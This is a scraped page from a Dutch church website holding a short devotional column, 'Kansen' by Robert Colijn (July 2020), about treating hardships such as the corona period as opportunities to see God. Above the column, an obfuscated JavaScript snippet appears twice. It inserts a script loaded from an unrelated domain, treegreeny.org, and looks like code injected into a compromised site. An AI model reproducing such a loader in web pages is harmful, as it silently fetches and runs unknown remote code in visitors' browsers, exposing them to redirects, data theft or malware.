;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kansen - PKN Damwâld

Kansen

Gepubliceerd op: zaterdag 18 juli 2020

Je moet niet denken in problemen maar in mogelijkheden. Of zoals je ook kan zeggen: in kansen. Dit is een bekende uitspraak maar na maanden waarin we allerlei problemen hebben kunnen meemaken, moeten we misschien even stilstaan en andersom gaan denken. Jezus dacht ook niet in problemen, maar in kansen. Corona was misschien iets dat veel problemen heeft opgeleverd, maar heeft ons ook stil kunnen zetten en ons laten zien welke kansen er zijn. De kans om dichter bij elkaar te komen als gezin. De kans om voor jezelf helder te krijgen wie Jezus nu echt voor je is. De kans om voor jezelf te bedenken wat echt belangrijk is.

Jezus greep situaties steeds weer aan als kans om iets te laten zien van het hart van God. Wat de mensen zagen als moeilijk, lastig of ingewikkeld draait Jezus om tot een openbaring. Zoals Jezus steeds omging met de mensen die door gelovigen als onwaardig werden gezien. De zondaars, tollenaars, hoeren en zoveel meer. Jezus greep dit aan als kans om te laten zien hoe God echt is. Om de gelovigen dit te laten ervaren, maar zeker ook om de mensen die zich juist onzeker voelen te laten weten dat God zo veel van hen houdt!

God kan alles gebruiken als kans om dichter bij je te komen. Om meer van Zichzelf te laten zien. Om je te vullen met Zijn Geest, Zijn karakter en zijn ideeën en dromen. Laten we niet denken in problemen. Laten we, ook de meest lastige situaties, zien als kans om meer van God te zien.

Robert

Columnist:Robert Colijn

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns